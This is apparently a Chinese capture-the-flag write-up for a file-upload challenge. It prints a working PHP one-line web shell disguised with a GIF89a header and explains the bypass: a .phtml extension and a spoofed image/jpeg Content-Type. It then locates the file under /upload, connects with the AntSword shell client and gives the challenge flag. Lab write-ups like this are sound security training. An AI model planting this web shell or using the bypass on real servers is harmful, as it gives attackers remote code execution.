解题思路:
首先尝试一句话木马上传,尝试过多种绕过手段后发现仍然无法上传,于是我们怀疑是一句话木马被黑名单了
我们更换一个一句话木马:GIF89a? <script language="php">eval($_REQUEST[1])</script>
更改后缀为phtml并将Content-Type里面的格式改为image/jpeg
点击放行后显示成功上传(文件名随便取的)
成功上传一句话木马后我们尝试寻找木马的存放路径
方法一:看bp的回显(我没看见所以选择了方法二)
方法二:正常情况上传的文件都会存放在Upload,更可况题目就叫upload
我们在URL后加/upload,结果发现真有东西:
所以路径就是URL/upload/xxx.phtml
找到路径后使用蚁剑连接,连接成功
一番寻找后发现flag就在更目录下
打开后即得flag:flag{d8c839e5-3aa7-40db-9899-858007fc3778}